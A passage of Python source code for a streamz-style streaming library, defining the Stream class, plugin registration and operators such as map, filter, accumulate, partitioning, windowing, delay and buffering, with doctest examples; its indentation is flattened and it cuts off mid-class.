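# API): the callback is scheduled on the loop once every retained reference
# has been released.
#
#     from tornado.ioloop import IOLoop
#     counter = RefCounter(initial=1, cb=lambda: print("done"),
#                          loop=IOLoop.current())
#     counter.retain()   # count: 1 -> 2
#     counter.release()  # count: 2 -> 1
#     counter.release()  # count: 1 -> 0, "done" is scheduled on the loop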
class APIRegisterMixin(object):
@classmethod
def register_api(cls, modifier=identity, attribute_name=None):
""" Add callable to Stream API
This allows you to register a new method onto this class. You can use
it as a decorator.::
>>> @Stream.register_api()
... class foo(Stream):
... ...
>>> Stream().foo(...) # this works now
It attaches the callable as a normal attribute to the class object. In
doing so it respects inheritance (all subclasses of Stream will also
get the foo attribute).
By default callables are assumed to be instance methods. If you like
you can include modifiers to apply before attaching to the class as in
the following case where we construct a ``staticmethod``.
>>> @Stream.register_api(staticmethod)
... class foo(Stream):
... ...
>>> Stream.foo(...) # Foo operates as a static method
You can also provide an optional ``attribute_name`` argument to control
the name of the attribute your callable will be attached as.
>>> @Stream.register_api(attribute_name="bar")
... class foo(Stream):
... ...
>>> Stream().bar(...) # foo was actually attached as bar
"""
def _(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
return func(*args, **kwargs)
name = attribute_name if attribute_name else func.__name__
setattr(cls, name, modifier(wrapped))
return func
return _
@classmethod
def register_plugin_entry_point(cls, entry_point, modifier=identity):
if hasattr(cls, entry_point.name):
raise ValueError(
f"Can't add {entry_point.name} from {entry_point.module_name} "
f"to {cls.__name__}: duplicate method name."
)
def stub(*args, **kwargs):
""" Entrypoints-based streamz plugin. Will be loaded on first call. """
node = entry_point.load()
if not issubclass(node, Stream):
raise TypeError(
f"Error loading {entry_point.name} "
f"from module {entry_point.module_name}: "
f"{node.__class__.__name__} must be a subclass of Stream"
)
if getattr(cls, entry_point.name).__name__ == "stub":
cls.register_api(
modifier=modifier, attribute_name=entry_point.name
)(node)
return node(*args, **kwargs)
cls.register_api(modifier=modifier, attribute_name=entry_point.name)(stub)
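# Usage sketch for plugin loading (the group and node names here are
# hypothetical): stubs are attached up front, and each stub is replaced by
# the real node class on its first call.
#
#     import entrypoints  # third-party package, used here for illustration
#     for ep in entrypoints.get_group_all("streamz.nodes"):
#         Stream.register_plugin_entry_point(ep)
#     Stream().my_plugin_node()  # loads the plugin class, then instantiates it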
class Stream(APIRegisterMixin):
""" A Stream is an infinite sequence of data.
Streams subscribe to each other passing and transforming data between them.
A Stream object listens for updates from upstream, reacts to these updates,
and then emits more data to flow downstream to all Stream objects that
subscribe to it. Downstream Stream objects may connect at any point of a
Stream graph to get a full view of the data coming off of that point to do
with as they will.
Parameters
----------
stream_name: str or None
This is the name of the stream.
asynchronous: boolean or None
Whether or not this stream will be used in asynchronous functions or
normal Python functions. Leave as None if you don't know.
True will cause operations like emit to return awaitable Futures
False will use an Event loop in another thread (starts it if necessary)
ensure_io_loop: boolean
Ensure that some IOLoop will be created. If asynchronous is None or
False then this will be in a separate thread, otherwise it will be
IOLoop.current
Examples
--------
>>> def inc(x):
... return x + 1
>>> source = Stream() # Create a stream object
>>> s = source.map(inc).map(str) # Subscribe to make new streams
>>> s.sink(print) # take an action whenever an element reaches the end
>>> L = list()
>>> s.sink(L.append) # or take multiple actions (streams can branch)
>>> for i in range(5):
... source.emit(i) # push data in at the source
'1'
'2'
'3'
'4'
'5'
>>> L # and the actions happen at the sinks
['1', '2', '3', '4', '5']
"""
_graphviz_shape = 'ellipse'
_graphviz_style = 'rounded,filled'
_graphviz_fillcolor = 'white'
_graphviz_orientation = 0
str_list = ['func', 'predicate', 'n', 'interval']
def __init__(self, upstream=None, upstreams=None, stream_name=None,
loop=None, asynchronous=None, ensure_io_loop=False):
self.name = stream_name
self.downstreams = OrderedWeakrefSet()
self.current_value = None
self.current_metadata = None
if upstreams is not None:
self.upstreams = list(upstreams)
elif upstream is not None:
self.upstreams = [upstream]
else:
self.upstreams = []
self._set_asynchronous(asynchronous)
self._set_loop(loop)
if ensure_io_loop and not self.loop:
self._set_asynchronous(False)
if self.loop is None and self.asynchronous is not None:
self._set_loop(get_io_loop(self.asynchronous))
for upstream in self.upstreams:
if upstream:
upstream.downstreams.add(self)
def _set_loop(self, loop):
self.loop = None
if loop is not None:
self._inform_loop(loop)
else:
for upstream in self.upstreams:
if upstream and upstream.loop:
self.loop = upstream.loop
break
def _inform_loop(self, loop):
"""
Percolate information about an event loop to the rest of the stream
"""
if self.loop is not None:
if self.loop is not loop:
raise ValueError("Two different event loops active")
else:
self.loop = loop
for upstream in self.upstreams:
if upstream:
upstream._inform_loop(loop)
for downstream in self.downstreams:
if downstream:
downstream._inform_loop(loop)
def _set_asynchronous(self, asynchronous):
self.asynchronous = None
if asynchronous is not None:
self._inform_asynchronous(asynchronous)
else:
for upstream in self.upstreams:
if upstream and upstream.asynchronous:
self.asynchronous = upstream.asynchronous
break
def _inform_asynchronous(self, asynchronous):
"""
Percolate information about an event loop to the rest of the stream
"""
if self.asynchronous is not None:
if self.asynchronous is not asynchronous:
raise ValueError("Stream has both asynchronous and synchronous elements")
else:
self.asynchronous = asynchronous
for upstream in self.upstreams:
if upstream:
upstream._inform_asynchronous(asynchronous)
for downstream in self.downstreams:
if downstream:
downstream._inform_asynchronous(asynchronous)
def _add_upstream(self, upstream):
"""Add upstream to current upstreams, this method is overridden for
classes which handle stream specific buffers/caches"""
self.upstreams.append(upstream)
def _add_downstream(self, downstream):
"""Add downstream to current downstreams"""
self.downstreams.add(downstream)
def _remove_downstream(self, downstream):
"""Remove downstream from current downstreams"""
self.downstreams.remove(downstream)
def _remove_upstream(self, upstream):
"""Remove upstream from current upstreams, this method is overridden for
classes which handle stream specific buffers/caches"""
self.upstreams.remove(upstream)
def start(self):
""" Start any upstream sources """
for upstream in self.upstreams:
upstream.start()
def stop(self):
""" Stop upstream sources """
for upstream in self.upstreams:
upstream.stop()
def __str__(self):
s_list = []
if self.name:
s_list.append('{}; {}'.format(self.name, self.__class__.__name__))
else:
s_list.append(self.__class__.__name__)
for m in self.str_list:
s = ''
at = getattr(self, m, None)
if at:
if not callable(at):
s = str(at)
elif hasattr(at, '__name__'):
s = getattr(self, m).__name__
else:
s = None
if s:
s_list.append('{}={}'.format(m, s))
if len(s_list) <= 2:
s_list = [term.split('=')[-1] for term in s_list]
text = "<"
text += s_list[0]
if len(s_list) > 1:
text += ': '
text += ', '.join(s_list[1:])
text += '>'
return text
__repr__ = __str__
def _ipython_display_(self, **kwargs): # pragma: no cover
try:
import ipywidgets
from IPython.core.interactiveshell import InteractiveShell
output = ipywidgets.Output(_view_count=0)
except ImportError:
# since this function is only called by jupyter, this import must succeed
from IPython.display import display, HTML
if hasattr(self, '_repr_html_'):
return display(HTML(self._repr_html_()))
else:
return display(self.__repr__())
output_ref = weakref.ref(output)
def update_cell(val):
output = output_ref()
if output is None:
return
with output:
content, *_ = InteractiveShell.instance().display_formatter.format(val)
output.outputs = ({'output_type': 'display_data',
'data': content,
'metadata': {}},)
s = self.map(update_cell)
_html_update_streams.add(s)
self.output_ref = output_ref
s_ref = weakref.ref(s)
def remove_stream(change):
output = output_ref()
if output is None:
return
if output._view_count == 0:
ss = s_ref()
ss.destroy()
_html_update_streams.remove(ss) # trigger gc
output.observe(remove_stream, '_view_count')
return output._ipython_display_(**kwargs)
def _emit(self, x, metadata=None):
"""
Push data into the stream at this point
Parameters
----------
x: any
an element of data
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
"""
self.current_value = x
self.current_metadata = metadata
if metadata:
self._retain_refs(metadata, len(self.downstreams))
else:
metadata = []
result = []
for downstream in list(self.downstreams):
r = downstream.update(x, who=self, metadata=metadata)
if type(r) is list:
result.extend(r)
else:
result.append(r)
self._release_refs(metadata)
return [element for element in result if element is not None]
def emit(self, x, asynchronous=False, metadata=None):
""" Push data into the stream at this point
This is typically done only at source Streams but can theoretically be
done at any point
Parameters
----------
x: any
an element of data
asynchronous:
emit asynchronously
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
"""
ts_async = getattr(thread_state, 'asynchronous', False)
if self.loop is None or asynchronous or self.asynchronous or ts_async:
if not ts_async:
thread_state.asynchronous = True
try:
result = self._emit(x, metadata=metadata)
if self.loop:
return gen.convert_yielded(result)
finally:
thread_state.asynchronous = ts_async
else:
async def _():
thread_state.asynchronous = True
try:
result = await asyncio.gather(*self._emit(x, metadata=metadata))
finally:
del thread_state.asynchronous
return result
sync(self.loop, _)
def update(self, x, who=None, metadata=None):
return self._emit(x, metadata=metadata)
def gather(self):
""" This is a no-op for core streamz
This allows gather to be used in both dask and core streams
"""
return self
def connect(self, downstream):
""" Connect this stream to a downstream element.
Parameters
----------
downstream: Stream
The downstream stream to connect to
"""
self._add_downstream(downstream)
downstream._add_upstream(self)
def disconnect(self, downstream):
""" Disconnect this stream to a downstream element.
Parameters
----------
downstream: Stream
The downstream stream to disconnect from
"""
self._remove_downstream(downstream)
downstream._remove_upstream(self)
@property
def upstream(self):
if len(self.upstreams) > 1:
raise ValueError("Stream has multiple upstreams")
elif len(self.upstreams) == 0:
return None
else:
return self.upstreams[0]
def destroy(self, streams=None):
"""
Disconnect this stream from any upstream sources
"""
if streams is None:
streams = self.upstreams
for upstream in list(streams):
upstream._remove_downstream(self)
self._remove_upstream(upstream)
def scatter(self, **kwargs):
from .dask import scatter
return scatter(self, **kwargs)
def remove(self, predicate):
""" Only pass through elements for which the predicate returns False """
return self.filter(lambda x: not predicate(x))
@property
def scan(self):
return self.accumulate
@property
def concat(self):
return self.flatten
def sink_to_list(self):
""" Append all elements of a stream to a list as they come in
Examples
--------
>>> source = Stream()
>>> L = source.map(lambda x: 10 * x).sink_to_list()
>>> for i in range(5):
... source.emit(i)
>>> L
[0, 10, 20, 30, 40]
"""
L = []
self.sink(L.append)
return L
def frequencies(self, **kwargs):
""" Count occurrences of elements """
def update_frequencies(last, x):
return toolz.assoc(last, x, last.get(x, 0) + 1)
return self.scan(update_frequencies, start={}, **kwargs)
def visualize(self, filename='mystream.png', **kwargs):
"""Render the computation of this object's task graph using graphviz.
Requires ``graphviz`` and ``networkx`` to be installed.
Parameters
----------
filename : str, optional
The name of the file to write to disk.
kwargs:
Graph attributes to pass to graphviz like ``rankdir="LR"``
"""
from .graph import visualize
return visualize(self, filename, **kwargs)
def to_dataframe(self, example):
""" Convert a stream of Pandas dataframes to a DataFrame
Examples
--------
>>> source = Stream()
>>> sdf = source.to_dataframe(example=pd.DataFrame({'x': [], 'y': []}))  # doctest: +SKIP
>>> L = sdf.groupby(sdf.x).y.mean().stream.sink_to_list()
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
>>> source.emit(pd.DataFrame(...)) # doctest: +SKIP
"""
from .dataframe import DataFrame
return DataFrame(stream=self, example=example)
def to_batch(self, **kwargs):
""" Convert a stream of lists to a Batch
All elements of the stream are assumed to be lists or tuples
Examples
--------
>>> source = Stream()
>>> batches = source.to_batch()
>>> L = batches.pluck('value').map(inc).sum().stream.sink_to_list()
>>> source.emit([{'name': 'Alice', 'value': 1},
... {'name': 'Bob', 'value': 2},
... {'name': 'Charlie', 'value': 3}])
>>> source.emit([{'name': 'Alice', 'value': 4},
... {'name': 'Bob', 'value': 5},
... {'name': 'Charlie', 'value': 6}])
"""
from .batch import Batch
return Batch(stream=self, **kwargs)
def _retain_refs(self, metadata, n=1):
""" Retain all references in the provided metadata `n` number of times
Parameters
----------
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
n: The number of times to retain the provided references
"""
for m in metadata:
if 'ref' in m:
m['ref'].retain(n)
def _release_refs(self, metadata, n=1):
""" Release all references in the provided metadata `n` number of times
Parameters
----------
metadata: list[dict], optional
Various types of metadata associated with the data element in `x`.
ref: RefCounter
A reference counter used to check when data is done
n: The number of times to retain the provided references
"""
for m in metadata:
if 'ref' in m:
m['ref'].release(n)
@Stream.register_api()
class map(Stream):
""" Apply a function to every element in the stream
Parameters
----------
func: callable
*args :
The arguments to pass to the function.
**kwargs:
Keyword arguments to pass to func
Examples
--------
>>> source = Stream()
>>> source.map(lambda x: 2*x).sink(print)
>>> for i in range(5):
... source.emit(i)
0
2
4
6
8
"""
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
try:
result = self.func(x, *self.args, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
else:
return self._emit(result, metadata=metadata)
@Stream.register_api()
class starmap(Stream):
""" Apply a function to every element in the stream, splayed out
See ``itertools.starmap``
Parameters
----------
func: callable
*args :
The arguments to pass to the function.
**kwargs:
Keyword arguments to pass to func
Examples
--------
>>> source = Stream()
>>> source.starmap(lambda a, b: a + b).sink(print)
>>> for i in range(5):
... source.emit((i, i))
0
2
4
6
8
"""
def __init__(self, upstream, func, *args, **kwargs):
self.func = func
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
y = x + self.args
try:
result = self.func(*y, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
else:
return self._emit(result, metadata=metadata)
def _truthy(x):
return bool(x)
@Stream.register_api()
class filter(Stream):
""" Only pass through elements that satisfy the predicate
Parameters
----------
predicate : function
The predicate. Should return True or False, where
True means that the predicate is satisfied.
*args :
The arguments to pass to the predicate.
**kwargs:
Keyword arguments to pass to predicate
Examples
--------
>>> source = Stream()
>>> source.filter(lambda x: x % 2 == 0).sink(print)
>>> for i in range(5):
... source.emit(i)
0
2
4
"""
def __init__(self, upstream, predicate, *args, **kwargs):
if predicate is None:
predicate = _truthy
self.predicate = predicate
stream_name = kwargs.pop("stream_name", None)
self.kwargs = kwargs
self.args = args
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
if self.predicate(x, *self.args, **self.kwargs):
return self._emit(x, metadata=metadata)
@Stream.register_api()
class accumulate(Stream):
""" Accumulate results with previous state
This performs running or cumulative reductions, applying the function
to the previous total and the new element. The function should take
two arguments, the previous accumulated state and the next element and
it should return a new accumulated state,
- ``state = func(previous_state, new_value)`` (returns_state=False)
- ``state, result = func(previous_state, new_value)`` (returns_state=True)
where the new_state is passed to the next invocation. The state or result
is emitted downstream for the two cases.
Parameters
----------
func: callable
start: object
Initial value, passed as the value of ``previous_state`` on the first
invocation. Defaults to the first submitted element
returns_state: boolean
If true then func should return both the state and the value to emit
If false then both values are the same, and func returns one value
**kwargs:
Keyword arguments to pass to func
Examples
--------
A running total, producing triangular numbers
>>> source = Stream()
>>> source.accumulate(lambda acc, x: acc + x).sink(print)
>>> for i in range(5):
... source.emit(i)
0
1
3
6
10
A count of number of events (including the current one)
>>> source = Stream()
>>> source.accumulate(lambda acc, x: acc + 1, start=0).sink(print)
>>> for _ in range(5):
... source.emit(0)
1
2
3
4
5
Like the builtin "enumerate".
>>> source = Stream()
>>> source.accumulate(lambda acc, x: ((acc[0] + 1, x), (acc[0], x)),
... start=(0, 0), returns_state=True
... ).sink(print)
>>> for i in range(3):
... source.emit(0)
(0, 0)
(1, 0)
(2, 0)
"""
_graphviz_shape = 'box'
def __init__(self, upstream, func, start=no_default, returns_state=False,
**kwargs):
self.func = func
self.kwargs = kwargs
self.state = start
self.returns_state = returns_state
# this is one of a few stream specific kwargs
stream_name = kwargs.pop('stream_name', None)
self.with_state = kwargs.pop('with_state', False)
Stream.__init__(self, upstream, stream_name=stream_name)
def update(self, x, who=None, metadata=None):
if self.state is no_default:
self.state = x
if self.with_state:
return self._emit((self.state, x), metadata=metadata)
else:
return self._emit(x, metadata=metadata)
else:
try:
result = self.func(self.state, x, **self.kwargs)
except Exception as e:
logger.exception(e)
raise
if self.returns_state:
state, result = result
else:
state = result
self.state = state
if self.with_state:
return self._emit((self.state, result), metadata=metadata)
else:
return self._emit(result, metadata=metadata)
@Stream.register_api()
class slice(Stream):
"""
Get only some events in a stream by position. Works like list[] syntax.
Parameters
----------
start : int
First event to use. If None, start from the beginning
end : int
Last event to use (non-inclusive). If None, continue without stopping.
Does not support negative indexing.
step : int
Pass on every Nth event. If None, pass every one.
Examples
--------
>>> source = Stream()
>>> source.slice(2, 6, 2).sink(print)
>>> for i in range(5):
... source.emit(i)
2
4
"""
def __init__(self, upstream, start=None, end=None, step=None, **kwargs):
self.state = 0
self.star = start or 0  # named "star", not "start", to avoid shadowing Stream.start()
self.end = end
self.step = step or 1
if any((_ or 0) < 0 for _ in [start, end, step]):
raise ValueError("Negative indices not supported by slice")
stream_name = kwargs.pop('stream_name', None)
Stream.__init__(self, upstream, stream_name=stream_name)
self._check_end()
def update(self, x, who=None, metadata=None):
if self.state >= self.star and (self.state - self.star) % self.step == 0:  # step counts from the start position, as in list slicing
self.emit(x, metadata=metadata)
self.state += 1
self._check_end()
def _check_end(self):
if self.end and self.state >= self.end:
# we're done
for upstream in self.upstreams:
upstream._remove_downstream(self)
@Stream.register_api()
class partition(Stream):
""" Partition stream into tuples of equal size
Parameters
----------
n: int
Maximum partition size
timeout: int or float, optional
Number of seconds after which a partition will be emitted,
even if its size is less than ``n``. If ``None`` (default),
a partition will be emitted only when its size reaches ``n``.
key: hashable or callable, optional
Emit items with the same key together as a separate partition.
If ``key`` is callable, partition will be identified by ``key(x)``,
otherwise by ``x[key]``. Defaults to ``None``.
Examples
--------
>>> source = Stream()
>>> source.partition(3).sink(print)
>>> for i in range(10):
... source.emit(i)
(0, 1, 2)
(3, 4, 5)
(6, 7, 8)
>>> source = Stream()
>>> source.partition(2, key=lambda x: x % 2).sink(print)
>>> for i in range(4):
... source.emit(i)
(0, 2)
(1, 3)
>>> from time import sleep
>>> source = Stream()
>>> source.partition(5, timeout=1).sink(print)
>>> for i in range(3):
... source.emit(i)
>>> sleep(1)
(0, 1, 2)
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, timeout=None, key=None, **kwargs):
self.n = n
self._timeout = timeout
self._key = key
self._buffer = defaultdict(lambda: [])
self._metadata_buffer = defaultdict(lambda: [])
self._callbacks = {}
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
def _get_key(self, x):
if self._key is None:
return None
if callable(self._key):
return self._key(x)
return x[self._key]
@gen.coroutine
def _flush(self, key):
result, self._buffer[key] = self._buffer[key], []
metadata_result, self._metadata_buffer[key] = self._metadata_buffer[key], []
yield self._emit(tuple(result), list(metadata_result))
self._release_refs(metadata_result)
@gen.coroutine
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
key = self._get_key(x)
buffer = self._buffer[key]
metadata_buffer = self._metadata_buffer[key]
buffer.append(x)
if isinstance(metadata, list):
metadata_buffer.extend(metadata)
else:
metadata_buffer.append(metadata)
if len(buffer) == self.n:
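# A full partition flushes immediately; cancel the timeout flush
# that was scheduled when the partition's first element arrived.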
if self._timeout is not None and self.n > 1:
self._callbacks[key].cancel()
yield self._flush(key)
return
if len(buffer) == 1 and self._timeout is not None:
self._callbacks[key] = self.loop.call_later(
self._timeout, self._flush, key
)
@Stream.register_api()
class partition_unique(Stream):
"""
Partition stream elements into groups of equal size with unique keys only.
Parameters
----------
n: int
Number of (unique) elements to pass through as a group.
key: Union[Hashable, Callable[[Any], Hashable]]
Callable that accepts a stream element and returns a unique, hashable
representation of the incoming data (``key(x)``), or a hashable that gets
the corresponding value of a stream element (``x[key]``). For example,
``key=lambda x: x["a"]`` would allow only elements with unique ``"a"`` values
to pass through.
.. note:: By default, we simply use the element object itself as the key,
so that object must be hashable. If that's not the case, a non-default
key must be provided.
keep: str
Which element to keep in the case that a unique key is already found
in the group. If "first", keep element from the first occurrence of a given
key; if "last", keep element from the most recent occurrence. Note that
relative ordering of *elements* is preserved in the data passed through,
and not ordering of *keys*.
**kwargs
Examples
--------
>>> source = Stream()
>>> stream = source.partition_unique(n=3, keep="first").sink(print)
>>> eles = [1, 2, 1, 3, 1, 3, 3, 2]
>>> for ele in eles:
... source.emit(ele)
(1, 2, 3)
(1, 3, 2)
>>> source = Stream()
>>> stream = source.partition_unique(n=3, keep="last").sink(print)
>>> eles = [1, 2, 1, 3, 1, 3, 3, 2]
>>> for ele in eles:
... source.emit(ele)
(2, 1, 3)
(1, 3, 2)
>>> source = Stream()
>>> stream = source.partition_unique(n=3, key=lambda x: len(x), keep="last").sink(print)
>>> eles = ["f", "fo", "f", "foo", "f", "foo", "foo", "fo"]
>>> for ele in eles:
... source.emit(ele)
('fo', 'f', 'foo')
('f', 'foo', 'fo')
"""
_graphviz_shape = "diamond"
def __init__(
self,
upstream,
n: int,
key: Union[Hashable, Callable[[Any], Hashable]] = identity,
keep: str = "first", # Literal["first", "last"]
**kwargs
):
self.n = n
self.key = key
self.keep = keep
self._buffer = {}
self._metadata_buffer = {}
Stream.__init__(self, upstream, **kwargs)
def _get_key(self, x):
if callable(self.key):
return self.key(x)
else:
return x[self.key]
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
y = self._get_key(x)
if self.keep == "last":
# remove key if already present so that emitted value
# will reflect elements' actual relative ordering
self._buffer.pop(y, None)
self._metadata_buffer.pop(y, None)
self._buffer[y] = x
self._metadata_buffer[y] = metadata
else: # self.keep == "first"
if y not in self._buffer:
self._buffer[y] = x
self._metadata_buffer[y] = metadata
if len(self._buffer) == self.n:
result, self._buffer = tuple(self._buffer.values()), {}
metadata_result, self._metadata_buffer = list(self._metadata_buffer.values()), {}
ret = self._emit(result, metadata_result)
self._release_refs(metadata_result)
return ret
else:
return []
@Stream.register_api()
class sliding_window(Stream):
""" Produce overlapping tuples of size n
Parameters
----------
return_partial : bool
If True, yield tuples as soon as any events come in, each tuple being
smaller than or equal to the window size. If False, only start yielding
tuples once a full window has accrued.
Examples
--------
>>> source = Stream()
>>> source.sliding_window(3, return_partial=False).sink(print)
>>> for i in range(8):
... source.emit(i)
(0, 1, 2)
(1, 2, 3)
(2, 3, 4)
(3, 4, 5)
(4, 5, 6)
(5, 6, 7)
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, return_partial=True, **kwargs):
self.n = n
self._buffer = deque(maxlen=n)
self.metadata_buffer = deque(maxlen=n)
self.partial = return_partial
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
self._buffer.append(x)
if not isinstance(metadata, list):
metadata = [metadata]
self.metadata_buffer.append(metadata)
if self.partial or len(self._buffer) == self.n:
flat_metadata = [m for ml in self.metadata_buffer for m in ml]
ret = self._emit(tuple(self._buffer), flat_metadata)
if len(self.metadata_buffer) == self.n:
completed = self.metadata_buffer.popleft()
self._release_refs(completed)
return ret
else:
return []
def convert_interval(interval):
if isinstance(interval, str):
import pandas as pd
interval = pd.Timedelta(interval).total_seconds()
return interval
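# For example (pandas is required for string input): convert_interval("500ms")
# returns 0.5, while plain numbers pass through unchanged.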
@Stream.register_api()
class timed_window(Stream):
""" Emit a tuple of collected results every interval
Every ``interval`` seconds this emits a tuple of all of the results
seen so far. This can help to batch data coming off of a high-volume
stream.
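Examples
--------
A usage sketch; the output depends on timing, so it is skipped by doctest
(the very first interval may flush an empty tuple):
>>> source = Stream()
>>> source.timed_window(interval=0.1).sink(print)  # doctest: +SKIP
>>> for i in range(3):
... source.emit(i)  # doctest: +SKIP
()
(0, 1, 2)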
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self._buffer = []
self.metadata_buffer = []
self.last = gen.moment
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
self._buffer.append(x)
self._retain_refs(metadata)
self.metadata_buffer.append(metadata)
return self.last
@gen.coroutine
def cb(self):
while True:
L, self._buffer = self._buffer, []
metadata, self.metadata_buffer = self.metadata_buffer, []
m = [m for ml in metadata for m in ml]
self.last = self._emit(L, m)
self._release_refs(m)
yield self.last
yield gen.sleep(self.interval)
@Stream.register_api()
class timed_window_unique(Stream):
"""
Emit a group of elements with unique keys every ``interval`` seconds.
Parameters
----------
interval: Union[int, str]
Number of seconds over which to group elements, or a ``pandas``-style
duration string that can be converted into seconds.
key: Union[Hashable, Callable[[Any], Hashable]]
Callable that accepts a stream element and returns a unique, hashable
representation of the incoming data (``key(x)``), or a hashable that gets
the corresponding value of a stream element (``x[key]``). For example, both
``key=lambda x: x["a"]`` and ``key="a"`` would allow only elements with unique
``"a"`` values to pass through.
.. note:: By default, we simply use the element object itself as the key,
so that object must be hashable. If that's not the case, a non-default
key must be provided.
keep: str
Which element to keep in the case that a unique key is already found
in the group. If "first", keep element from the first occurrence of a given
key; if "last", keep element from the most recent occurrence. Note that
relative ordering of *elements* is preserved in the data passed through,
and not ordering of *keys*.
Examples
--------
>>> source = Stream()
Get unique hashable elements in a window, keeping just the first occurrence:
>>> stream = source.timed_window_unique(interval=1.0, keep="first").sink(print)
>>> for ele in [1, 2, 3, 3, 2, 1]:
... source.emit(ele)
()
(1, 2, 3)
()
Get unique hashable elements in a window, keeping just the last occurrence:
>>> stream = source.timed_window_unique(interval=1.0, keep="last").sink(print)
>>> for ele in [1, 2, 3, 3, 2, 1]:
... source.emit(ele)
()
(3, 2, 1)
()
Get unique elements in a window by (string) length, keeping just the first occurrence:
>>> stream = source.timed_window_unique(interval=1.0, key=len, keep="first")
>>> for ele in ["f", "b", "fo", "ba", "foo", "bar"]:
... source.emit(ele)
()
('f', 'fo', 'foo')
()
Get unique elements in a window by (string) length, keeping just the last occurrence:
>>> stream = source.timed_window_unique(interval=1.0, key=len, keep="last")
>>> for ele in ["f", "b", "fo", "ba", "foo", "bar"]:
... source.emit(ele)
()
('b', 'ba', 'bar')
()
"""
_graphviz_shape = "octagon"
def __init__(
self,
upstream,
interval: Union[int, str],
key: Union[Hashable, Callable[[Any], Hashable]] = identity,
keep: str = "first", # Literal["first", "last"]
**kwargs
):
self.interval = convert_interval(interval)
self.key = key
self.keep = keep
self._buffer = {}
self._metadata_buffer = {}
self.last = gen.moment
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.loop.add_callback(self.cb)
def _get_key(self, x):
if callable(self.key):
return self.key(x)
else:
return x[self.key]
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
y = self._get_key(x)
if self.keep == "last":
# remove key if already present so that emitted value
# will reflect elements' actual relative ordering
self._buffer.pop(y, None)
self._metadata_buffer.pop(y, None)
self._buffer[y] = x
self._metadata_buffer[y] = metadata
else: # self.keep == "first"
if y not in self._buffer:
self._buffer[y] = x
self._metadata_buffer[y] = metadata
return self.last
@gen.coroutine
def cb(self):
while True:
result, self._buffer = tuple(self._buffer.values()), {}
metadata_result, self._metadata_buffer = list(self._metadata_buffer.values()), {}
# TODO: figure out why metadata_result is handled differently here...
m = [m for ml in metadata_result for m in ml]
self.last = self._emit(result, m)
self._release_refs(m)
yield self.last
yield gen.sleep(self.interval)
@Stream.register_api()
class delay(Stream):
""" Add a time delay to results """
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self.queue = Queue()
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream,**kwargs)
self.loop.add_callback(self.cb)
@gen.coroutine
def cb(self):
while True:
last = time()
x, metadata = yield self.queue.get()
yield self._emit(x, metadata=metadata)
self._release_refs(metadata)
duration = self.interval - (time() - last)
if duration > 0:
yield gen.sleep(duration)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
return self.queue.put((x, metadata))
@Stream.register_api()
class rate_limit(Stream):
""" Limit the flow of data
This prevents two elements from streaming through within an interval
shorter than the provided value.
Parameters
----------
interval: float
Time in seconds
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, interval, **kwargs):
self.interval = convert_interval(interval)
self.next = 0
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
@gen.coroutine
def update(self, x, who=None, metadata=None):
now = time()
old_next = self.next
self.next = max(now, self.next) + self.interval
if now < old_next:
yield gen.sleep(old_next - now)
yield self._emit(x, metadata=metadata)
@Stream.register_api()
class buffer(Stream):
""" Allow results to pile up at this point in the stream
This allows results to buffer in place at various points in the stream.
This can help to smooth flow through the system when backpressure is
applied.
"""
_graphviz_shape = 'diamond'
def __init__(self, upstream, n, **kwargs):
self.queue = Queue(maxsize=n)
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
return self.queue.put((x, metadata))
@gen.coroutine
def cb(self):
while True:
x, metadata = yield self.queue.get()
yield self._emit(x, metadata=metadata)
self._release_refs(metadata)
@Stream.register_api()
class zip(Stream):
""" Combine streams together into a stream of tuples
We emit a new tuple once every stream has produced a new element.
See also
--------
combine_latest
zip_latest
"""
_graphviz_orientation = 270
_graphviz_shape = 'triangle'
def __init__(self, *upstreams, **kwargs):
self.maxsize = kwargs.pop('maxsize', 10)
self.condition = Condition()
self.literals = [(i, val) for i, val in enumerate(upstreams)
if not isinstance(val, Stream)]
self.buffers = {upstream: deque()
for upstream in upstreams
if isinstance(upstream, Stream)}
upstreams2 = [upstream for upstream in upstreams if isinstance(upstream, Stream)]
Stream.__init__(self, upstreams=upstreams2, **kwargs)
def _add_upstream(self, upstream):
# Override method to handle setup of buffer for new stream
self.buffers[upstream] = deque()
super(zip, self)._add_upstream(upstream)
def _remove_upstream(self, upstream):
